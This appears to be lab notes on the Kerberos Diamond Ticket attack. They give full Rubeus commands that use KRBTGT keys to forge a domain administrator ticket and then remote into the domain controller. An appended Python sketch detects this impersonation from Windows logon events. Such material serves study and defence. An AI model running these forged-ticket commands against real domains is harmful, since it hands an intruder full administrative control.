A Diamond Ticket is an attack where we request a TGT from the KDC, decrypt it with the KRBTGT hash, modify the ticket, and then send it back to the KDC, which helps in avoiding detection.

Diamond Ticket Using Rubeus

.\Rubeus.exe diamond /krbkey:c22697a1fae7d6d996e0b3de103c0ec403a0d39b2348c1a0d19f3ff44979e8d3 /tgtdeleg /enctype:aes /ticketuser:Administrator /domain:bank.local /dc:dc-1.bank.local /ticketuserid:500 /groups:512 /ptt
.\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:Administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Now we have a new cmd window opened for us.

Let’s try PowerShell remoting to the DC from the new cmd window:

Enter-PSSession -ComputerName dcorp-dc

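A defender-side sketch of one way to look for the impersonation shown above, added here and not part of the original write-up: it flags service-ticket requests (event 4769) for an account with no recent TGT issuance (event 4768) from the same client address. The event records, the student1 account, the addresses and the 10-hour window are constructed assumptions; the heuristic only applies when the modified ticket carries a different user name than the account that requested it, and NAT or incomplete logs can cause false positives.

```python
from datetime import datetime, timedelta

# Constructed, simplified records using the TargetUserName / IpAddress fields
# of Security events 4768 (TGT issued) and 4769 (service ticket issued).
EVENTS = [
    {"id": 4768, "time": "2024-05-01T09:00:00", "TargetUserName": "student1", "IpAddress": "::ffff:10.0.0.5"},
    {"id": 4769, "time": "2024-05-01T09:05:00", "TargetUserName": "student1@BANK.LOCAL", "IpAddress": "::ffff:10.0.0.5"},
    # Service ticket for Administrator from a host that never got a TGT for it.
    {"id": 4769, "time": "2024-05-01T09:30:00", "TargetUserName": "Administrator@BANK.LOCAL", "IpAddress": "::ffff:10.0.0.5"},
    # Legitimate Administrator logon from a different (constructed) admin host.
    {"id": 4768, "time": "2024-05-01T08:00:00", "TargetUserName": "Administrator", "IpAddress": "::ffff:10.0.0.9"},
    {"id": 4769, "time": "2024-05-01T08:10:00", "TargetUserName": "Administrator@BANK.LOCAL", "IpAddress": "::ffff:10.0.0.9"},
]

MAX_TGT_AGE = timedelta(hours=10)  # assumption: default maximum TGT lifetime


def principal(event):
    """Normalise to (account, client address): drop the realm and ::ffff: prefix."""
    user = event["TargetUserName"].split("@", 1)[0].lower()
    return user, event["IpAddress"].replace("::ffff:", "")


def tgs_without_as(events, max_age=MAX_TGT_AGE):
    """Return 4769 events with no 4768 for the same account and host within max_age."""
    issued = {}  # (account, address) -> times a TGT was issued
    for e in events:
        if e["id"] == 4768:
            issued.setdefault(principal(e), []).append(datetime.fromisoformat(e["time"]))
    findings = []
    for e in events:
        if e["id"] != 4769:
            continue
        when = datetime.fromisoformat(e["time"])
        times = issued.get(principal(e), [])
        # A match must precede the request and still be inside the TGT lifetime.
        if not any(timedelta(0) <= when - t <= max_age for t in times):
            findings.append(e)
    return findings


if __name__ == "__main__":
    for hit in tgs_without_as(EVENTS):
        print(hit["time"], *principal(hit))
```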